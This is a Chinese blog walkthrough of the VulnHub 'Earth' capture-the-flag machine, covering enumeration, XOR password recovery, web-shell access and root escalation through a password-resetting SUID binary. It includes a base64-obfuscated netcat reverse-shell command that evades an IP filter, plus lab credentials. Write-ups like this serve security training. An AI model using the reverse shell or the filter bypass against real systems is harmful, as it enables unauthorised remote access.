earth靶机详解

earth靶机复盘

靶场下载地址:https://download.vulnhub.com/theplanets/Earth.ova

这个靶场还是非常有意思的,值得去打一下。

我们对拿到的ip进行一个单独全面的扫描,发现有两个DNS解析。

image-20230729184404010

就把这两条解析添加到hosts文件中去,要么无法打开网站。

image-20230729184619820

这样网站就可以正常打开了。

image-20230729184652068

扫描ip时候我们发现443是打开的,扫描第二个dns解析的443端口能扫描出来一个robots.txt

dirsearch -u https://terratest.earth.local/

image-20230729191237104
打开后我们发现一个notes.*,就是什么后缀名都可以,但是notes明显应该是txt后缀。

image-20230729191424367

打开后我们拿到了一个用户名terra,并且这里告诉了我们一个加密方式是利用XOR异或方式加密的。

image-20230729191453397

这个页面其实就是我们的密钥。

image-20230729192257707

而密文就是我们主页面最下面这一串16进制的数字,我们可以看出来这里面最大的数就是F,所以肯定是一个16进制的数字。

image-20230729192405898

在cyberchef把密文先用一个hex解密16进制的解密,然后XOR时候放上我们的密钥,这样就能解密出来了,我们发现解密出来的东西很有规律,复制我们最前面的这一串。

image-20230729192606067

然后在Key的位置放上去,发现作者就是用这一串加密的,能得到相同的output。

image-20230729192626359

因为我们得到一个用户名,一个密钥,其实就是我们的密码,肯定还有一个登陆网站。

这个登陆网站也可以在目录中扫描出来,我这里就不扫描了。

image-20230729192659354

user:terra

passwd:earthclimatechangebad4humans

这样就登陆上来了,发现这里其实是一个shell。

image-20230729192812854

当我们远程时候发现不让我们远程,这里其实是给我们的ip地址做了一个过滤,就是不让我们输入ip地址,只要有ip地址就不行,但是我们可以用别的方法来绕过。

image-20230729193100577

这里我们可以把我们反弹shell加密成base64编码。

image-20230729193138194

然后用echo命令来执行,base64 -d是解码base64,后面加上sh是执行前面的内容,所以这样我们就绕过去不让输入ip地址了。

echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTAyLjEyOSA4ODg4|base64 -d|sh

同时kali监听一下就拿到了一个shell。

image-20230729193546953

登陆上后我们先usr/bin/script -qc /bin/bash /dev/null拿到一个稳定的shell

用find查找一下又suid权限的文件,发现有一个奇怪的文件,执行了一下发现不能执行。

image-20230729194440182

image-20230729194904600

把这个文件拷贝到我们kali中分析一下,看看是什么问题。

image-20230729194703479

kali监听时候输出到一个文件中去。

image-20230729194651789

file一下发现是个可执行文件,并且文件执行过程中会修改root密码。

image-20230729194719928

给这个文件价格权限就能在本机执行了,但是依然会出错。

然后利用ltrace工具可以分析这个文件执行时候在什么地方出错了。

结果发现是少了三个文件。

image-20230729194839253

我们在kali中创建一下这三个文件,再执行发现执行成功了

并且root密码被修改成Earch了。

image-20230729195136154

su root顺利拿到root权限。

image-20230729195217331

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值